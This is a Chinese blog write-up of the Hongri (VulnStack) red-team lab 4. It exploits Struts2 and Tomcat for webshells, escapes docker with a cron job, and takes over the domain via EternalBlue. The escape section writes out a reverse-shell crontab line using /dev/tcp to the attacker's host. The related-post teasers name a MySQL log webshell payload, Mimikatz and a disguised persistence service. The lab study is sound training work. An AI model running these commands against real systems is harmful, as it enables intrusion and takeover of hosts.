红日靶场-红队4

发表于2026-03-04|更新于2026-03-04|安全技术

|浏览量:

红日靶场4实战

涉及docker逃逸

网络拓扑

主机	IP
WEB	内网：10.10.10.128 外网：192.168.109.157
Win7	10.10.10.129
DC	10.10.10.131
kali	192.168.109.133

外网渗透

kali扫描内网存活主机

访问2001端口为Struts2

利用Struts2框架漏洞扫描工具扫描

上传shell文件，哥斯拉成功连接

访问2002端口为Tomcat

利用Tomcat 8.5.19版本的漏洞，轻松拿到shell，详见文章https://blog.csdn.net/allintao/article/details/129503762

两个端口对应的服务都有相应的漏洞，均能拿到shell

内网渗透

使用的计划任务逃逸docker

./cdk* eva –full

挂载目录

写入计划任务

echo ‘*/1 * * * * root bash -c “bash -i >& /dev/tcp/192.168.109.133/4000 0>&1”‘ >> crontab

同时，kali开启监听4000端口，成功逃逸

上传fscan扫描内网环境，发现129和131两个存活IP，并且都开启445端口

MSF扫描存在永恒之蓝，尝试使用永恒之蓝漏洞攻击

成功拿到域成员win7主机和DC域控

总结

本次实战在常规的内网渗透下，加入了docker环境，主要考察从docker环境逃逸至真实主机的能力。同时这次实战，收获了两个新的工具，Sturts2和Tomcat的框架漏洞扫描利用工具，对于外部渗透有了新的理解，即在确定框架后，通过使用网上的利用工具能够很快的是识别利用漏洞，进而拿到webshell，在内网渗透中，docker搭建web应用时，一定要注意使用的版本和主机本身的内核版本，一旦因没有及时更新或没有采取防护措施，都将造成极大的后果。

文章作者: Liang

文章链接: https://xiaoliang8.cn/2026/03/04/hongri4/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Xiaoliang！

渗透测试靶场实战

相关推荐

红日靶场-红队2

红日靶场红队2实战（关闭360版）环境搭建主机 IP 扮演角色网卡配置 kali 192.168.109.133 攻击主机 NAT DC 10.10.10.10 域控服务器 VMnet1（仅主机） PC 10.10.10.201 内网主机 VMnet1（仅主机） WEB 192.168.109.20010.10.10.80 外网主机/跳板机 NATVMnet1（仅主机）内网主机相互能够ping通，外网主机能够相互ping通，但是外网主机kali无法ping通内网拓扑图踩坑点：关闭防火墙 WEB主机在登录时需要切换de1ay用户 WEB主机的WebLogic 需要手动启动启动方法找到启动脚本: 打开资源管理器，进入以下目录： C:\Oracle\Middleware\user_projects\domains\base_domain\bin 管理员运行: 找到 startWebLogic.cmd，右键选择“以管理员身份运行”。等待启动: 弹出的 CMD 窗口不要关闭！等待几分钟，直到看到类似 Serve...

红日靶场-蓝队web2

web2 1.攻击者的IP地址（两个）？ 2.攻击者的webshell文件名？3.攻击者的webshell密码？4.攻击者的QQ号？5.攻击者的服务器伪IP地址？6.攻击者的服务器端口？7.攻击者是如何入侵的（选择题）？8.攻击者的隐藏用户名？攻击者的两个ip 第一个ip：看apache日志，发现这个ip在扫目录攻击者的shell文件和密码在ftp日志发现攻击者上传了一个名为system.php的文件打开system.php,为shell文件攻击者的伪造服务器ip和端口在浏览记录里发现打开配置文件入侵方式： ftp 内网穿透工具后面的问题用工具windowslog（一个快速查找计算机相关信息的工具）可以快速找到攻击流程： 1.扫描网站目录 2.成功爆破了ftp的账号密码并上传恶意文件system.php 3.system.php是一个webshell文件，攻击者连接上之后，创建了一个影子用户hack887$ 4.通过qq传输内网反向代理工具FRP 复现攻击： 1.扫描端口 2.使用ncrack对ftp进行爆破 3.进行远程登录ftp，...

红日靶场-红队5

红日靶场5实战网络拓扑主机 IP 作用 win7 192.168.135.150192.168.138.151 双网卡主机/跳板机 win2008 192.168.138.138 内网域控 kali 192.168.135.128 攻击机外网渗透win7开启phpstudy nmap扫描外网IP开放端口，445端口也是开启状态访问80端口 thinkphp，使用该框架的漏洞扫描利用工具进行扫描，并一键上传木马哥斯拉连接成功使用kali里自带的CS生成木马文件，并上传至踏板机 cs成功上线，转移进程Spawn（派生一个新的隐藏进程） 1spawn x64 kill掉原来进程 whoami查看权限为最高权限内网渗透CS内置模块扫描内网存活主机扫描DC主机端口开放情况 Mimikatz获取该主机存储的账号密码尝试psexec横向移动成功上线DC域控主机同时这两台主机也有永恒之蓝漏洞权限维持将木马文件加入服务自启 1shell sc create "WindowsUpdate" binpath...

红日靶场-红队1

红日靶场 (VulnStack 1) 内网渗透实战环境拓扑与资产梳理网络拓扑图： **涉及技术：**Web漏洞利用，mysql日志写马，内网信息收集、Cobalt Strike C2 部署、SMB Beacon、横向移动渗透测试过程边界突破 (Initial Access) 信息搜集：使用 Nmap 扫描发现 80 端口开启 Web 服务，3306 开启 MySQL 服务，同时使用dirseacher发现phpMyAdmin目录漏洞发现：通过 phpMyAdmin 弱口令 (root/root) 进入后台漏洞利用 (GetShell)：尝试：使用 INTO OUTFILE 导出文件失败，发现受 secure-file-priv 限制。绕过：利用 MySQL 通用日志 (General Log) 功能写入 Webshell。 Payload: SET GLOBAL general_log_file = 'C:/phpStudy/WWW/shell.php'; 结果：成功写入一句话木马，并使用中国蚁剑连接成功。权限维持与 C2 上线 (...

红日靶场-蓝队web1

web1 wp 1.shell密码 2.攻击者的IP地址 3.攻击者的隐藏账户名称 4.攻击者挖矿程序的矿池域名思路点：针对前两个问题，我首先想到的是分析日志，攻击者进行攻击时必然会留下痕迹，查看日志是一个发现攻击者相关信息的很好的方法；第三个问题可以在事件管理器里面找到事件id为4720的事件，最后一个第一次接触，尝试了很久都没有发现，最后是查了文章解出来的攻击者的shell密码和ip：开机界面查看phpstduy中安装的web中间件和文件传输ftp的日志 apache：这里可以看到ip为192.168.126.1有一个类似上传文件，并且后续一直对shell.php访问 nginx和ftp日志里都是空白进入攻击者上传的文件中攻击者的ip为192.168.126.1 shell密码为rebeyond 攻击者的隐藏账户名称：在事件管理器中，筛选事件id为4720的事件得到攻击者的隐藏用户：hack168 挖矿软件的矿池域名：在hack168用户的桌面找到kuang，运行之后是挖矿软件用pyinstaller对kuang进行反编译得到直接打开...